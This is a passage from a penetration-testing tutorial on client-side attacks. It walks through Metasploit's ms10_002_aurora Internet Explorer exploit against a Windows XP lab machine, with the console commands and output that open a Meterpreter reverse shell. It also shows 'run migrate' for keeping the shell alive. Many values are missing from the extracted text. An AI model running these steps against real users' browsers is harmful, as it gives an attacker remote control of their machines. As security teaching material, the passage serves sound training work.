background image

Exploitation Using Client-Side Attacks


msf exploit(ms10_002_aurora) > 


msf exploit(ms10_002_aurora) > 

set LPORT 443

LPORT => 443
msf exploit(ms10_002_aurora) > 

exploit -z

[*] Exploit running as background job.
msf exploit(ms10_002_aurora) >
[*] Started reverse handler on
[*] Using URL:
[*] Local IP:
[*] Server started.

msf exploit(ms10_002_aurora) >

First, notice that the default setting for 


   is This means 

that the web server will bind to all interfaces. The 


 at  , 8080, is the 

port to which the targeted user needs to connect for the exploit to trigger. 
We will be using port 80 instead of 8080, however. We could also set up the 
server for SSL, but for this example, we’ll stick with standard HTTP. 



is the URL the user will need to enter to trigger the vulnerability, and we set 
this to a slash (


) at  .

With our settings defined, use your Windows XP virtual machine and 

connect to the attacker using 



attacker’s IP address

>. You’ll notice the 

machine becomes a bit sluggish. After a little waiting, you should see a Meter-
preter shell. In the background, the heap spray was performed and the jump 
into the dynamic memory was executed, to hit your shellcode eventually. If 
you open Task Manager in Windows before you run this exploit, you can 
actually see the memory for 


 growing significantly based on the 

contact growth of the heap. 

msf exploit(ms10_002_aurora) >
[*] Sending Internet Explorer "Aurora" Memory Corruption to client
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened ( ->

msf exploit(ms10_002_aurora) > 

sessions -i 1

[*] Starting interaction with 1...

meterpreter >

You now have a Meterpreter shell, but there’s a slight problem. What if 

the targeted user closes the browser based on the sluggishness of her com-
puter? You would effectively lose your session to the target, and although the 
exploit is successful, it would be cut off prematurely. Fortunately, there is a way 
around this: Simply type 

run migrate

 as soon as the connection is established, and 

hope that you make it in time. This Meterpreter script automatically migrates 
to the memory space of a separate process, usually 


, to improve the 

chances of keeping your shell open if the targeted user closes the originally 
exploited process.